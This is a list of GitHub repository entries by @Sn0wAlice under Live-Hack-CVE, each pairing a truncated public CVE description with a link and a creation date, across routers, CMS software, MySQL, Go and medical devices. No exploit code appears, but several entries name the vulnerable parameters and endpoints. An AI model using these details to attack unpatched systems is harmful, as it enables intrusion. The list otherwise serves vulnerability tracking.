**GrowthBook is an open-source platform for feature flagging and A/B testing. With some self-hosted configurations in versions prior to 2022-08-29, attackers can register new accounts and upload files to arbitrary directories within the container. If the attacker uploads a Python script to the right location, they can ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36065](https://github.com/Live-Hack-CVE/CVE-2022-36065) create time: 2022-12-29T20:18:40Z

**Multiple vulnerabilities exist in the processing of packet data by the LLDP service of AOS-CX. Successful exploitation of these vulnerabilities may allow an attacker to impact the availability of the AOS-CX LLDP service and/or the management plane of the switch in ArubaOS-CX Switches version(s): AOS-CX 10.09.xxxx: 10.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23689](https://github.com/Live-Hack-CVE/CVE-2022-23689) create time: 2022-12-29T20:18:31Z

**Multiple vulnerabilities exist in the processing of packet data by the LLDP service of AOS-CX. Successful exploitation of these vulnerabilities may allow an attacker to impact the availability of the AOS-CX LLDP service and/or the management plane of the switch in ArubaOS-CX Switches version(s): AOS-CX 10.09.xxxx: 10.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23686](https://github.com/Live-Hack-CVE/CVE-2022-23686) create time: 2022-12-29T20:18:27Z

**Multiple vulnerabilities exist in the processing of packet data by the LLDP service of AOS-CX. Successful exploitation of these vulnerabilities may allow an attacker to impact the availability of the AOS-CX LLDP service and/or the management plane of the switch in ArubaOS-CX Switches version(s): AOS-CX 10.09.xxxx: 10.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23687](https://github.com/Live-Hack-CVE/CVE-2022-23687) create time: 2022-12-29T20:18:24Z

**Authenticated command injection vulnerabilities exist in the AOS-CX Network Analytics Engine via NAE scripts. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system, leading to a complete compromise of the switch runni CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23683](https://github.com/Live-Hack-CVE/CVE-2022-23683) create time: 2022-12-29T20:18:21Z

**A vulnerability in the web-based management interface of AOS-CX could allow a remote authenticated user with read-only privileges to escalate their permissions to those of an administrative user. Successful exploitation of this vulnerability allows an attacker to escalate privileges beyond their authorized level in Aru CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23684](https://github.com/Live-Hack-CVE/CVE-2022-23684) create time: 2022-12-29T20:18:17Z

**Multiple vulnerabilities exist in the AOS-CX command line interface that could lead to authenticated command injection. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete switch compromise in ArubaOS-CX version(s): AOS-CX 10.09.xxxx: CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23681](https://github.com/Live-Hack-CVE/CVE-2022-23681) create time: 2022-12-29T20:17:54Z

**Multiple vulnerabilities exist in the AOS-CX command line interface that could lead to authenticated command injection. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete switch compromise in ArubaOS-CX version(s): AOS-CX 10.09.xxxx: CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23682](https://github.com/Live-Hack-CVE/CVE-2022-23682) create time: 2022-12-29T20:17:50Z

**FPT G-97RG6M R4.2.98.035 and G-97RG3 R4.2.43.078 are vulnerable to Remote Command Execution in the ping function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38531](https://github.com/Live-Hack-CVE/CVE-2022-38531) create time: 2022-12-29T20:17:46Z

**Phicomm FIR151B A2, FIR302E A2, FIR300B A2, FIR303B A2 routers V3.0.1.17 were discovered to contain a remote command execution (RCE) vulnerability via the sendnum parameter of the ping function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37779](https://github.com/Live-Hack-CVE/CVE-2022-37779) create time: 2022-12-29T20:17:43Z

**Phicomm FIR151B A2, FIR302E A2, FIR300B A2, FIR303B A2 routers V3.0.1.17 were discovered to contain a remote command execution (RCE) vulnerability via the current_time parameter of the time function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37778](https://github.com/Live-Hack-CVE/CVE-2022-37778) create time: 2022-12-29T20:17:39Z

**Phicomm FIR151B A2, FIR302E A2, FIR300B A2, FIR303B A2 routers 3.0.1.17 and earlier were discovered to contain a remote command execution (RCE) vulnerability via the trHops parameter of the tracert function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37777](https://github.com/Live-Hack-CVE/CVE-2022-37777) create time: 2022-12-29T20:17:36Z

**linked_list_allocator is an allocator usable for no_std systems. Prior to version 0.10.2, the heap initialization methods were missing a minimum size check for the given heap size argument. This could lead to out-of-bound writes when a heap was initialized with a size smaller than `3 * size_of::` because of meta CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36086](https://github.com/Live-Hack-CVE/CVE-2022-36086) create time: 2022-12-29T20:17:29Z

**mangadex-downloader is a command-line tool to download manga from MangaDex. When using `file:` command and `` is a web URL location (http, https), mangadex-downloader between versions 1.3.0 and 1.7.2 will try to open and read a file in local disk for each line of website contents. Version 1.7.2 cont CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36082](https://github.com/Live-Hack-CVE/CVE-2022-36082) create time: 2022-12-29T20:17:25Z

**Wikmd is a file based wiki that uses markdown. Prior to version 1.7.1, Wikmd is vulnerable to path traversal when accessing `/list/` and discloses lists of files located on the server including sensitive data. Version 1.7.1 fixes this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36081](https://github.com/Live-Hack-CVE/CVE-2022-36081) create time: 2022-12-29T20:17:22Z

**Wikmd is a file based wiki that uses markdown. Prior to version 1.7.1, an attacker could capture user's session cookies or execute malicious Javascript when a victim edits a markdown file. Version 1.7.1 fixes this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36080](https://github.com/Live-Hack-CVE/CVE-2022-36080) create time: 2022-12-29T20:17:18Z

**Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Internal fields (keys used internally by Parse Server, prefixed by `_`) and protected fields (user defined) can be used as query constraints. Internal and protected fields are removed by Parse Server and are only ret CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36079](https://github.com/Live-Hack-CVE/CVE-2022-36079) create time: 2022-12-29T20:17:14Z

**Flux2 is a tool for keeping Kubernetes clusters in sync with sources of configuration, and Flux's helm-controller is a Kubernetes operator that allows one to declaratively manage Helm chart releases. Helm controller is tightly integrated with the Helm SDK. A vulnerability found in the Helm SDK that affects flux2 v0.0.1 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36049](https://github.com/Live-Hack-CVE/CVE-2022-36049) create time: 2022-12-29T20:17:11Z

**A vulnerability was found in codeprojects Online Driving School. It has been rated as critical. Affected by this issue is some unknown functionality of the file /registration.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3129](https://github.com/Live-Hack-CVE/CVE-2022-3129) create time: 2022-12-29T20:17:07Z

**A vulnerability classified as critical has been found in codeprojects Online Driving School. This affects an unknown part of the file /login.php. The manipulation of the argument username leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3130](https://github.com/Live-Hack-CVE/CVE-2022-3130) create time: 2022-12-29T20:17:03Z

**RubyGems.org is the Ruby community gem host. A bug in password & email change confirmation code allowed an attacker to change their RubyGems.org account's email to an unowned email address. Having access to an account whose email has been changed could enable an attacker to save API keys for that account, and when a le CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36073](https://github.com/Live-Hack-CVE/CVE-2022-36073) create time: 2022-12-29T20:16:59Z

**NETGEAR R6200_V2 firmware versions through R6200v2-V1.0.3.12_10.1.11 and R6300_V2 firmware versions through R6300v2-V1.0.4.52_10.0.93 allow remote authenticated attackers to execute arbitrary command via shell metacharacters in the ipv6_fix.cgi ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, or ipv6_lan_length param CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30078](https://github.com/Live-Hack-CVE/CVE-2022-30078) create time: 2022-12-29T20:16:35Z

**Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 9.0.277.0 and 10.x before 10.1.53.64, and Adobe AIR before 2.0.2.12610, when Firefox or Chrome is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to URL parsing. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-2179](https://github.com/Live-Hack-CVE/CVE-2010-2179) create time: 2022-12-29T18:53:54Z

**protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafte CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-0053](https://github.com/Live-Hack-CVE/CVE-2012-0053) create time: 2022-12-29T18:59:38Z

**envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-0883](https://github.com/Live-Hack-CVE/CVE-2012-0883) create time: 2022-12-29T18:59:34Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.65 and earlier, and 5.5.27 and earlier, allows local users to affect confidentiality via unknown vectors related to Server Installation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3160](https://github.com/Live-Hack-CVE/CVE-2012-3160) create time: 2022-12-29T18:48:50Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.64 and earlier, and 5.5.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server Replication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3197](https://github.com/Live-Hack-CVE/CVE-2012-3197) create time: 2022-12-29T18:48:40Z

**Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.9 and earlier allows local users to affect availability via unknown vectors related to Server Partition. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1502](https://github.com/Live-Hack-CVE/CVE-2013-1502) create time: 2022-12-29T18:48:54Z

**The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server before 2.4.8 allows remote attackers to cause a denial of service (segmentation fault and daemon crash) via a crafted cookie that is not properly handled during truncation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0098](https://github.com/Live-Hack-CVE/CVE-2014-0098) create time: 2022-12-29T18:59:30Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.38 and earlier and 5.6.19 and earlier allows local users to affect confidentiality via vectors related to CLIENT:MYSQLADMIN. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6551](https://github.com/Live-Hack-CVE/CVE-2014-6551) create time: 2022-12-29T18:48:47Z

**Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.72 and earlier, 5.5.34 and earlier, and 5.6.14 and earlier allows remote authenticated users to affect availability via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0401](https://github.com/Live-Hack-CVE/CVE-2014-0401) create time: 2022-12-29T18:48:43Z

**Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier and 5.6.26 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : Partition, a different vulnerability than CVE-2015-4802. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-4792](https://github.com/Live-Hack-CVE/CVE-2015-4792) create time: 2022-12-29T18:48:57Z

**An issue was discovered in PSPP 1.6.2. There is a heap-based buffer overflow at the function read_bytes_internal in utilities/pspp-dump-sav.c, which allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact. This issue is different from CVE-2018-20230. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39831](https://github.com/Live-Hack-CVE/CVE-2022-39831) create time: 2022-12-29T18:54:01Z

**Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the addqq() method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21652](https://github.com/Live-Hack-CVE/CVE-2020-21652) create time: 2022-12-29T18:59:06Z

**Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\point.php, which can be exploited via the add() method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21651](https://github.com/Live-Hack-CVE/CVE-2020-21651) create time: 2022-12-29T18:59:03Z

**A stack-based buffer overflow in the httpd server on Tenda AC9 V15.03.06.60_EN allows remote attackers to execute arbitrary code or cause a denial of service (DoS) via a crafted POST request to /goform/SetStaticRouteCfg. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20746](https://github.com/Live-Hack-CVE/CVE-2020-20746) create time: 2022-12-29T18:58:59Z

**An issue in Gate One 1.2.0 allows attackers to bypass to the verification check done by the origins list and connect to Gate One instances used by hosts not on the origins list. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-19003](https://github.com/Live-Hack-CVE/CVE-2020-19003) create time: 2022-12-29T18:58:56Z

**Myucms v2.2.1 contains a remote code execution (RCE) vulnerability in the component \controller\Config.php, which can be exploited via the add() method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-21650](https://github.com/Live-Hack-CVE/CVE-2020-21650) create time: 2022-12-29T18:58:52Z

**Wuzhi CMS v4.1.0 contains a remote code execution (RCE) vulnerability in \attachment\admin\index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20124](https://github.com/Live-Hack-CVE/CVE-2020-20124) create time: 2022-12-29T18:58:48Z

**rudp v0.6 was discovered to contain a memory leak in the component main.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-20665](https://github.com/Live-Hack-CVE/CVE-2020-20665) create time: 2022-12-29T18:58:45Z

**HashiCorp Vault and Vault Enterprise allowed for enumeration of Secrets Engine mount paths via unauthenticated HTTP requests. Fixed in 1.6.2 & 1.5.7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25594](https://github.com/Live-Hack-CVE/CVE-2020-25594) create time: 2022-12-29T18:58:38Z

**In man2html 1.6g, a filename can be created to overwrite the previous size parameter of the next chunk and the fd, bk, fd_nextsize, bk_nextsize of the current chunk. The next chunk is then freed later on, causing a freeing of an arbitrary amount of memory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40648](https://github.com/Live-Hack-CVE/CVE-2021-40648) create time: 2022-12-29T18:59:27Z

**In man2html 1.6g, a specific string being read in from a file will overwrite the size parameter in the top chunk of the heap. This at least causes the program to segmentation abort if the heap size parameter isn't aligned correctly. In version before GLIBC version 2.29 and aligned correctly, it allows arbitrary write a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40647](https://github.com/Live-Hack-CVE/CVE-2021-40647) create time: 2022-12-29T18:59:23Z

**HashiCorp Vault and Vault Enterprise disclosed the internal IP address of the Vault node when responding to some invalid, unauthenticated HTTP requests. Fixed in 1.6.2 & 1.5.7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3024](https://github.com/Live-Hack-CVE/CVE-2021-3024) create time: 2022-12-29T18:58:41Z

**HashiCorp Consul and Consul Enterprise 1.9.0 through 1.10.0 default deny policy with a single L7 application-aware intention deny action cancels out, causing the intention to incorrectly fail open, allowing L4 traffic. Fixed in 1.9.8 and 1.10.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36213](https://github.com/Live-Hack-CVE/CVE-2021-36213) create time: 2022-12-29T18:58:35Z

**HashiCorp Consul and Consul Enterprise 1.10.1 Txn.Apply endpoint allowed services to register proxies for other services, enabling access to service traffic. Fixed in 1.8.15, 1.9.9 and 1.10.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38698](https://github.com/Live-Hack-CVE/CVE-2021-38698) create time: 2022-12-29T18:58:31Z

**In Go before 1.14.14 and 1.15.x before 1.15.7, crypto/elliptic/p224.go can generate incorrect outputs, related to an underflow of the lowest limb during the final complete reduction in the P-224 field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3114](https://github.com/Live-Hack-CVE/CVE-2021-3114) create time: 2022-12-29T18:58:28Z

**Go before 1.14.14 and 1.15.x before 1.15.7 on Windows is vulnerable to Command Injection and remote code execution when using the "go get" command to fetch modules that make use of cgo (for example, cgo can execute a gcc program from an untrusted download). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3115](https://github.com/Live-Hack-CVE/CVE-2021-3115) create time: 2022-12-29T18:58:24Z

**In Go before 1.15.13 and 1.16.x before 1.16.5, there can be a panic for a large exponent to the math/big.Rat SetString or UnmarshalText method. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33198](https://github.com/Live-Hack-CVE/CVE-2021-33198) create time: 2022-12-29T18:57:51Z

**In Go before 1.15.13 and 1.16.x before 1.16.5, some configurations of ReverseProxy (from net/http/httputil) result in a situation where an attacker is able to drop arbitrary headers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33197](https://github.com/Live-Hack-CVE/CVE-2021-33197) create time: 2022-12-29T18:57:47Z

**Go before 1.15.13 and 1.16.x before 1.16.5 has functions for DNS lookups that do not validate replies from DNS servers, and thus a return value may contain an unsafe injection (e.g., XSS) that does not conform to the RFC1035 format. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33195](https://github.com/Live-Hack-CVE/CVE-2021-33195) create time: 2022-12-29T18:57:44Z

**Go before 1.17 does not properly consider extraneous zero characters at the beginning of an IP address octet, which (in some situations) allows attackers to bypass access control that is based on IP addresses, because of unexpected octal interpretation. This affects net.ParseIP and net.ParseCIDR. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29923](https://github.com/Live-Hack-CVE/CVE-2021-29923) create time: 2022-12-29T18:57:40Z

**Go before 1.15.15 and 1.16.x before 1.16.7 has a race condition that can lead to a net/http/httputil ReverseProxy panic upon an ErrAbortHandler abort. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36221](https://github.com/Live-Hack-CVE/CVE-2021-36221) create time: 2022-12-29T18:57:37Z

**PDF Labs pdftk-java v3.2.3 was discovered to contain an infinite loop via the component /text/pdf/PdfReader.java. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-37819](https://github.com/Live-Hack-CVE/CVE-2021-37819) create time: 2022-12-29T18:56:22Z

**An issue was discovered in Active Intelligent Visualization 5. The Vdc header is used in a SQL query without being sanitized. This causes SQL injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44835](https://github.com/Live-Hack-CVE/CVE-2021-44835) create time: 2022-12-29T18:52:58Z

**SmartVista SVFE2 v2.2.22 was discovered to contain multiple SQL injection vulnerabilities via the UserForm:j_id88, UserForm:j_id90, and UserForm:j_id92 parameters at /SVFE2/pages/feegroups/service_group.jsf. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38615](https://github.com/Live-Hack-CVE/CVE-2022-38615) create time: 2022-12-29T18:59:20Z

**An issue in the IGB Files and OutfileService features of SmartVista Cardgen v3.28.0 allows attackers to list and download arbitrary files via modifying the PATH parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38614](https://github.com/Live-Hack-CVE/CVE-2022-38614) create time: 2022-12-29T18:59:16Z

**Arq Backup 7.19.5.0 and below stores backup encryption passwords using reversible encryption. This issue allows attackers with administrative privileges to recover cleartext passwords. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36617](https://github.com/Live-Hack-CVE/CVE-2022-36617) create time: 2022-12-29T18:59:13Z

**XWiki Platform Web Parent POM contains Web resources for the XWiki platform, a generic wiki platform. Starting with version 1.0 and prior to versions 13.10.6 and 14.30-rc-1, it's possible to store JavaScript which will be executed by anyone viewing the history of an attachment containing javascript in its name. This is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36094](https://github.com/Live-Hack-CVE/CVE-2022-36094) create time: 2022-12-29T18:59:10Z

**Digiwin BPM has a XML External Entity Injection (XXE) vulnerability due to insufficient validation for user input. An unauthenticated remote attacker can perform XML injection attack to access arbitrary system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32458](https://github.com/Live-Hack-CVE/CVE-2022-32458) create time: 2022-12-29T18:58:21Z

**Digiwin BPM has inadequate filtering for URL parameter. An unauthenticated remote attacker can perform Blind SSRF attack to discover internal network topology base on URL error response. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32457](https://github.com/Live-Hack-CVE/CVE-2022-32457) create time: 2022-12-29T18:58:17Z

**Digiwin BPM’s function has insufficient validation for user input. An unauthenticated remote attacker can inject arbitrary SQL command to access, modify, delete database or disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32456](https://github.com/Live-Hack-CVE/CVE-2022-32456) create time: 2022-12-29T18:57:55Z

**OpenHarmony-v3.1.2 and prior versions have a heap overflow vulnerability. Local attackers can trigger a heap overflow and get network sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38701](https://github.com/Live-Hack-CVE/CVE-2022-38701) create time: 2022-12-29T18:57:33Z

**OpenHarmony-v3.1.1 and prior versions have a permission bypass vulnerability. LAN attackers can bypass permission control and get control of camera service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38700](https://github.com/Live-Hack-CVE/CVE-2022-38700) create time: 2022-12-29T18:57:29Z

**A use-after-free(UAF) vulnerability was found in function 'vmw_cmd_res_check' in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in Linux kernel's vmwgfx driver with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38457](https://github.com/Live-Hack-CVE/CVE-2022-38457) create time: 2022-12-29T18:57:26Z

**A NULL pointer dereference vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file '/dev/dri/renderD128 (or Dxxx)'. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38096](https://github.com/Live-Hack-CVE/CVE-2022-38096) create time: 2022-12-29T18:57:22Z

**OpenHarmony-v3.1.2 and prior versions have a permission bypass vulnerability. LAN attackers can bypass the distributed permission control.To take advantage of this weakness, attackers need another vulnerability to obtain system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38081](https://github.com/Live-Hack-CVE/CVE-2022-38081) create time: 2022-12-29T18:57:19Z

**Unauthenticated Event Deletion vulnerability in Totalsoft Event Calendar – Calendar plugin <= 1.4.6 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38067](https://github.com/Live-Hack-CVE/CVE-2022-38067) create time: 2022-12-29T18:57:15Z

**Cross-Site Request Forgery (CSRF) vulnerability in Vinoj Cardoza's Captcha Code plugin <= 2.7 at WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37411](https://github.com/Live-Hack-CVE/CVE-2022-37411) create time: 2022-12-29T18:57:12Z

**The CMS8000 device does not properly control or sanitize the SSID name of a new Wi-Fi access point. A threat actor could create an SSID with a malicious name, including non-standard characters that, when the device attempts connecting to the malicious SSID, the device can be exploited to write arbitrary files or displa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3027](https://github.com/Live-Hack-CVE/CVE-2022-3027) create time: 2022-12-29T18:57:08Z

**Multiple binary application files on the CMS8000 device are compiled with 'not stripped' and 'debug_info' compilation settings. These compiler settings greatly decrease the level of effort for a threat actor to reverse engineer sensitive code and identify additional vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38453](https://github.com/Live-Hack-CVE/CVE-2022-38453) create time: 2022-12-29T18:57:04Z

**The CMS800 device fails while attempting to parse malformed network data sent by a threat actor. A threat actor with network access can remotely issue a specially formatted UDP request that will cause the entire device to crash and require a physical reboot. A UDP broadcast request could be sent that causes a mass deni CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38100](https://github.com/Live-Hack-CVE/CVE-2022-38100) create time: 2022-12-29T18:57:01Z

**Multiple globally default credentials exist across all CMS8000 devices, that once exposed, allow a threat actor with momentary physical access to gain privileged access to any device. Privileged credential access enables the extraction of sensitive patient information or modification of device parameters CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38069](https://github.com/Live-Hack-CVE/CVE-2022-38069) create time: 2022-12-29T18:56:57Z

**A local file inclusion (LFI) vulnerability in D-Link DIR 819 v1.06 allows attackers to cause a Denial of Service (DoS) or access sensitive server information via manipulation of the getpage parameter in a crafted web request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38258](https://github.com/Live-Hack-CVE/CVE-2022-38258) create time: 2022-12-29T18:56:29Z

**Netmaker makes networks with WireGuard. Prior to version 0.15.1, Improper Authorization functions lead to non-privileged users running privileged API calls. If someone adds users to the Netmaker platform who do not have admin privileges, they can use their auth tokens to run admin-level functions via the API. This prob CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36110](https://github.com/Live-Hack-CVE/CVE-2022-36110) create time: 2022-12-29T18:56:26Z

**This affects the package github.com/gophish/gophish before 0.12.0. The Open Redirect vulnerability exists in the next query parameter. The application uses url.Parse(r.FormValue("next")) to extract path and eventually redirect user to a relative URL, but if next parameter starts with multiple backslashes like \\\\\\exa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25295](https://github.com/Live-Hack-CVE/CVE-2022-25295) create time: 2022-12-29T18:56:19Z

**SysAid Help Desk before 22.1.65 allows XSS via the Asset Dashboard, aka FR# 67262. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40325](https://github.com/Live-Hack-CVE/CVE-2022-40325) create time: 2022-12-29T18:56:15Z

**SysAid Help Desk before 22.1.65 allows XSS via the Linked SRs field, aka FR# 67258. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40324](https://github.com/Live-Hack-CVE/CVE-2022-40324) create time: 2022-12-29T18:56:11Z

**SysAid Help Desk before 22.1.65 allows XSS, aka FR# 66542 and 65579. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40322](https://github.com/Live-Hack-CVE/CVE-2022-40322) create time: 2022-12-29T18:56:08Z

**In Simple Online Book Store System 1.0 in /admin_book.php the Title, Author, and Description parameters are vulnerable to Cross Site Scripting(XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37796](https://github.com/Live-Hack-CVE/CVE-2022-37796) create time: 2022-12-29T18:56:04Z

**In Library Management System 1.0 the /card/in-card.php file id_no parameters are vulnerable to SQL injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37794](https://github.com/Live-Hack-CVE/CVE-2022-37794) create time: 2022-12-29T18:56:00Z

**Cross-site scripting vulnerability in Movable Type plugin A-Form versions prior to 4.1.1 (for Movable Type 7 Series) and versions prior to 3.9.1 (for Movable Type 6 Series) allows a remote unauthenticated attacker to inject an arbitrary script. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38972](https://github.com/Live-Hack-CVE/CVE-2022-38972) create time: 2022-12-29T18:55:57Z

**Multiple persistent cross-site scripting (XSS) vulnerabilities in index.php in tramyardg Hotel Management System 1.0 allow remote attackers to inject arbitrary web script or HTML via multiple parameters such as "fullname". CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36254](https://github.com/Live-Hack-CVE/CVE-2022-36254) create time: 2022-12-29T18:55:53Z

**An issue in Micro-Star International MSI Feature Navigator v1.0.1808.0901 allows attackers to download arbitrary files regardless of file type or size. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34110](https://github.com/Live-Hack-CVE/CVE-2022-34110) create time: 2022-12-29T18:55:49Z

**An issue in Micro-Star International MSI Feature Navigator v1.0.1808.0901 allows attackers to write arbitrary files to the directory \PromoPhoto\, regardless of file type or size. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34109](https://github.com/Live-Hack-CVE/CVE-2022-34109) create time: 2022-12-29T18:55:46Z

**Adobe Shockwave Player before 11.5.7.609 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file, related to (1) an erroneous dereference and (2) a certain Shock.dir file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2010-1280](https://github.com/Live-Hack-CVE/CVE-2010-1280) create time: 2022-12-29T18:11:44Z

**Unspecified vulnerability in the Server component in Oracle MySQL 5.5.28 and earlier allows remote authenticated users with Server Privileges to affect availability via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-5096](https://github.com/Live-Hack-CVE/CVE-2012-5096) create time: 2022-12-29T18:09:55Z

**Unspecified vulnerability in Oracle MySQL 5.1.63 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server Types. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1548](https://github.com/Live-Hack-CVE/CVE-2013-1548) create time: 2022-12-29T18:09:51Z

**Unspecified vulnerability in Oracle MySQL 5.5.30 and earlier and 5.6.10 and earlier allows remote authenticated users to affect availability via unknown vectors related to InnoDB. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1511](https://github.com/Live-Hack-CVE/CVE-2013-1511) create time: 2022-12-29T18:09:33Z

